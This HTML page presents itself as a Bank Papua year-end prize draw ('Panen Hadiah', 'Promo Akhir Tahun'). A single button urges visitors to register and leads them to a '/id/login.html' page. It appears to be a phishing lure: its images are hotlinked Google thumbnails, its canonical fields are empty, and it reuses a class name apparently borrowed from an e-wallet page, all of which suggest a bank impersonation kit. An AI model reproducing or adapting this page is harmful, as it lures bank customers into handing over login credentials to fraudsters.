<!DOCTYPE html>
<html lang="en">
 <head> 
  <meta charset="utf-8"> 
  <meta name="fragment" content="!"> 
    <meta name="description" content="">
    <link rel="canonical" href="" />
    <meta name="twitter:card" content="summary_large_image" />
    <meta property="og:title" content="Bank - Papua" />
    <meta name="twitter:title" content="Bank - Papua" />
    <meta property="og:site_name" content="Bank - Papua" />
    <meta name="twitter:site_name" content="Bank Papua" />
    <meta property="og:description" content="" />
    <meta name="twitter:description" content="" />
        <link rel="image_src" href="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSeRgwDnSlKWp8R-zAkZq7QedfRvZvBQ8qNATtQRm1hBWuXaRE60noQfbaO&s=10?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta property="og:image" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSeRgwDnSlKWp8R-zAkZq7QedfRvZvBQ8qNATtQRm1hBWuXaRE60noQfbaO&s=10?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta name="twitter:image:src" content="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSeRgwDnSlKWp8R-zAkZq7QedfRvZvBQ8qNATtQRm1hBWuXaRE60noQfbaO&s=10?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta property="og:url" content="" />
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
  <title>Bank Papua | Panen Hadiah</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"> 
  <link rel="stylesheet" type="text/css" href="/lib/style/index.css"> 
  <style>
        @import url('https://fonts.googleapis.com/css2?family=Open+Sans:wght@500&display=swap');
        body {
            font-family: 'Open Sans', sans-serif;
        }

        .text-header {
            font-family: 'Open Sans', sans-serif;
            color: #0086e0;
        }

        .text-subheader {
            font-family: 'Open Sans', sans-serif;
            margin-top: -60px;
            color: #000;
        }

        .btn-punya {
            display: block;
            margin: 0px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: red;
            border: none; 
            text-align: center; 
            height: 42px; 
            width: 200px; 
            max-width: 90%;
            font-family: Arial; 
            font-size: 15px; 
            font-weight: bold; 
            color: rgb(255, 255, 255); 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 5px; 
            box-shadow: rgb(170, 170, 170) 2px 2px 4px 0px; 
            transition: background 200ms ease 0s;
        }

        .btn-belum {
            display: block;
            margin: -70px auto 0 auto;
            padding: 0px; 
            cursor: pointer; 
            background: #FFA62F;
            border: none; 
            text-align: center; 
            height: 45px; 
            width: 3500px; 
            max-width: 90%;
            font-style:oblique;
            font-size: 16px; 
            font-weight: 600; 
            color: white; 
            letter-spacing: 2px; 
            line-height: 1; 
            border-radius: 50px; 
            transition: background 200ms ease 0s;
        }
        </style>
        </style>
 </head> 
 <body class="chakra-ui-light" style="background: #CECECE;">
  <div class="dana_index"> 
  	<center>
        <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQPSovC5UDW2gzeeZXPDoOwgC8Pv_b53D0ogQ&usqp=CAU" style="width: 102%; height: 400px; margin-left: -8px; margin-top: -1.50%;" alt=""><br>
<p style="color: #2F539B; font-size: 18px; margin-top: -20%; text-align: center; font-weight: bold; background: none; padding-top: 0%; padding-bottom: 20%;"><em>Selamat Datang<br>Promo Akhir Tahun Bank Papua<br>Buruan Segera Daftar.</em></p><br>
<em>
<button type="submit" class="btn-belum" onclick="location.href='/id/login.html';">DAFTAR UNDIAN</button> </em>
   </center>
  </div> 
<style>
@charset "windows-1252";
</style>
</body>
</html>
